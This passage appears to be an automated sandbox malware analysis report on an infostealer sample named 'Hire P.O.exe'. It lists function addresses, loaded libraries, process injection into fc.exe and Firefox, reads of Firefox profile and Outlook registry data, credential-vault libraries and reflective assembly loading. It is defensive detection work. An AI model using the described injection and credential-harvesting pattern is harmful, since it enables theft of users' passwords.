                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E72F307_2_02E72F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DF0F307_2_02DF0F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC0CF27_2_02DC0CF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E70CB57_2_02E70CB5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD0C007_2_02DD0C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DCADE07_2_02DCADE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DE8DBF7_2_02DE8DBF
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDAD007_2_02DDAD00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6CD1F7_2_02E6CD1F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E712ED7_2_02E712ED
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEB2C07_2_02DEB2C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD52A07_2_02DD52A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E1739A7_2_02E1739A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DBD34C7_2_02DBD34C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8132D7_2_02E8132D
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E870E97_2_02E870E9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8F0E07_2_02E8F0E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD70C07_2_02DD70C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E7F0CC7_2_02E7F0CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDB1B07_2_02DDB1B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E9B16B7_2_02E9B16B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E0516C7_2_02E0516C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DBF1727_2_02DBF172
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E816CC7_2_02E816CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8F7B07_2_02E8F7B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC14607_2_02DC1460
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8F43F7_2_02E8F43F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6D5B07_2_02E6D5B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E875717_2_02E87571
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E7DAC67_2_02E7DAC6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E15AA07_2_02E15AA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E71AA37_2_02E71AA3
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6DAAC7_2_02E6DAAC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E43A6C7_2_02E43A6C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FA497_2_02E8FA49
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E87A467_2_02E87A46
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E45BF07_2_02E45BF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E0DBF97_2_02E0DBF9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEFB807_2_02DEFB80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FB767_2_02E8FB76
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD38E07_2_02DD38E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E3D8007_2_02E3D800
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD99507_2_02DD9950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEB9507_2_02DEB950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E659107_2_02E65910
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD9EB07_2_02DD9EB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD1F927_2_02DD1F92
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FFB17_2_02E8FFB1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FF097_2_02E8FF09
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FCF27_2_02E8FCF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E49C327_2_02E49C32
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEFDC07_2_02DEFDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E87D737_2_02E87D73
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD3D407_2_02DD3D40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E81D5A7_2_02E81D5A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_00501C507_2_00501C50
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FCBA07_2_004FCBA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FCDC07_2_004FCDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FAE407_2_004FAE40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FB10B7_2_004FB10B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_005052E07_2_005052E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004F13A17_2_004F13A1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_005035107_2_00503510
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0050350C7_2_0050350C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0051B9707_2_0051B970
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E2BB7_2_02C9E2BB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9038F7_2_02C9038F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E0387_2_02C9E038
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E1537_2_02C9E153
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E4EC7_2_02C9E4EC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9D5B87_2_02C9D5B8
                Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02E3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02E05130 appears 58 times
                Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02E17E54 appears 102 times
                Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02DBB970 appears 278 times
                Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02E4F290 appears 105 times
                Source: C:\Users\user\Desktop\Hire P.O.exe Code function: String function: 0114F290 appears 105 times
                Source: C:\Users\user\Desktop\Hire P.O.exe Code function: String function: 010BB970 appears 275 times
                Source: C:\Users\user\Desktop\Hire P.O.exe Code function: String function: 01105130 appears 56 times
                Source: C:\Users\user\Desktop\Hire P.O.exe Code function: String function: 01117E54 appears 100 times
                Source: C:\Users\user\Desktop\Hire P.O.exe Code function: String function: 0113EA12 appears 86 times
                Source: Hire P.O.exe, 00000001.00000002.1525566861.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000000.1286956990.00000000005C8000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenameBaBC.exe8 vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1528583371.00000000070A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1528745888.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1525566861.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Hire P.O.exe
                Source: Hire P.O.exe, 00000001.00000002.1524815733.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Hire P.O.exe
                Source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs Hire P.O.exe
                Source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs Hire P.O.exe
                Source: Hire P.O.exe, 00000005.00000002.1863918098.00000000011BD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Hire P.O.exe
                Source: Hire P.O.exe Binary or memory string: OriginalFilenameBaBC.exe8 vs Hire P.O.exe
                Source: Hire P.O.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Hire P.O.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, JHAOCXLGd4WkGTvkMx.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.cs Security API names: _0020.SetAccessControl
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.cs Security API names: _0020.AddAccessRule
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, JHAOCXLGd4WkGTvkMx.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.cs Security API names: _0020.SetAccessControl
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@9/8
                Source: C:\Users\user\Desktop\Hire P.O.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hire P.O.exe.log
                Source: C:\Users\user\Desktop\Hire P.O.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\fc.exe File created: C:\Users\user\AppData\Local\Temp\0349A-n
                Source: Hire P.O.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Hire P.O.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Hire P.O.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: fc.exe, 00000007.00000002.3139261279.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2111312571.0000000000694000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2111312571.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2113920553.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3139261279.00000000006B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Hire P.O.exe ReversingLabs: Detection: 57%
                Source: unknown Process created: C:\Users\user\Desktop\Hire P.O.exe "C:\Users\user\Desktop\Hire P.O.exe"
                Source: C:\Users\user\Desktop\Hire P.O.exe Process created: C:\Users\user\Desktop\Hire P.O.exe "C:\Users\user\Desktop\Hire P.O.exe"
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\fc.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\Hire P.O.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Hire P.O.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Hire P.O.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Hire P.O.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Hire P.O.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: fc.pdb source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdbSHA2568 source: Hire P.O.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zKwhguHavy.exe, 00000006.00000002.3139218530.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941529168.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdb source: Hire P.O.exe
                Source: Binary string: wntdll.pdb source: Hire P.O.exe, Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                Source: Hire P.O.exe, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, KFwuvsj5SicMBvK28o.cs.Net Code: JXhcXNCa2u System.Reflection.Assembly.Load(byte[])
                Source: 1.2.Hire P.O.exe.8770000.4.raw.unpack, KFwuvsj5SicMBvK28o.cs.Net Code: JXhcXNCa2u System.Reflection.Assembly.Load(byte[])
                Source: 7.2.fc.exe.33bcd14.2.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.0.zKwhguHavy.exe.27ecd14.1.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.2.zKwhguHavy.exe.27ecd14.1.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 12.2.firefox.exe.37dccd14.0.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_08800012 push ebx; ret 1_2_08800016
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0041600F push esp; retf 5_2_00416030
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00405119 push ss; retf 5_2_0040511A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0040AA27 push cs; iretd 5_2_0040AA28
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004142D9 push esp; retf 5_2_004142DA
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00403330 push eax; ret 5_2_00403332
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0041844F push eax; iretd 5_2_00418450
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004165B3 push 00000032h; ret 5_2_004166AF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00416662 push 00000032h; ret 5_2_004166AF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00404EDD push ds; iretd 5_2_00404EED
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00418EF6 pushfd ; ret 5_2_00418F00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00416683 push 00000032h; ret 5_2_004166AF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00404EB6 push ecx; iretd 5_2_00404EC1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0041175E pushad ; retf 5_2_0041176E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_00406737 push eax; retf 5_2_0040673B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C09AD push ecx; mov dword ptr [esp], ecx5_2_010C09B6
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272D279 pushad ; retf 6_2_0272D289
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02722252 push eax; retf 6_2_02722256
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02731B2A push esp; retf 6_2_02731B4B
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02723061 push ebx; retf 6_2_02723062
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027320CE push 00000032h; ret 6_2_027321CA
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273217D push 00000032h; ret 6_2_027321CA
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272D12A pushad ; ret 6_2_0272D12B
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027209F8 push ds; iretd 6_2_02720A08
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027209D1 push ecx; iretd 6_2_027209DC
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273219E push 00000032h; ret 6_2_027321CA
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02733F6A push eax; iretd 6_2_02733F6B
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02720C34 push ss; retf 6_2_02720C35
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02726542 push cs; iretd 6_2_02726543
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272FDF4 push esp; retf 6_2_0272FDF5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC09AD push ecx; mov dword ptr [esp], ecx7_2_02DC09B6
                Source: Hire P.O.exeStatic PE information: section name: .text entropy: 7.743367974972074
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, RAs1axJvnF10Pv6eKl.csHigh entropy of concatenated method names: 'eKYb82Tycv', 'S38bG7ZFGg', 'NYObOTj10d', 'L9RbMA6lt5', 'hcGblY0nTy', 'kw4bjhHd0E', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, f1LjevILsq0YbrjDQs.csHigh entropy of concatenated method names: 'ToString', 'lGS5scoV80', 'SyA5YKXdEt', 'MlE5eVr38Q', 'RbA5iibl2W', 'tfk5tJcfH7', 'MnE5SHfMaT', 'Trd5reTaMS', 'SoY51mbQjb', 'AN05oJpd72'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, Y0B2qFTOrt8fYDnIPx.csHigh entropy of concatenated method names: 'QG1lVqC9YF', 'fxKlYAA5x5', 'PRpleeR3qV', 'HPjlii97tp', 'JvRltDoLGT', 'BlUlSmsI1n', 'epYlrIJhBT', 'k7Cl15bHAb', 'SsfloYcCYb', 'hrWlWZ17Ts'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, r9iVkW4yai1QaYMql0.csHigh entropy of concatenated method names: 'jg3XJwBDf', 'AXnwmu7q5', 'QcDumWv43', 'lTsCGPy6a', 'wny2WeymT', 'C8dhyWiel', 'p298q8MmQfcMcV29D1', 'PFHlE3jHI4ShiuX8p5', 'I1baypfKB', 'AdLb0SGVD'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, mP6s57zjbNgGXm0Y7p.csHigh entropy of concatenated method names: 'Vembur2B0n', 'uHIbL7VhLP', 'hfHb2yNbwo', 'Ui2bV7LjAh', 'rAWbYbNVr0', 'NsrbilRyFb', 'aEgbtCQy7c', 'J5ZbPD6KfG', 'R6Ubyod3ua', 'XNqbETed2q'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, iVuwKopcqJDeTOo64RM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lW29lEeHfi', 'mUr9bIG0iw', 'Y3h9F4GfDa', 'UDa99USKEN', 'PD69vu15kq', 'VXN9gZpqRw', 'OsE9P3JFbR'
                Source: 1.2.Hire P.O.exe.3ce2a30.2.raw.unpack, hs9Nap8aXLO5OZoZk9.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xnb4TV2VAx', 'xZo4JK4EaS', 'fBE4zgeYhk', 'iPZDmHXW0k', 'sPGDphrdHd', 'FSXD4OskJx', 'TVZDD3qWKp', 'OXN6qSt0HoPgVTXkjuD'
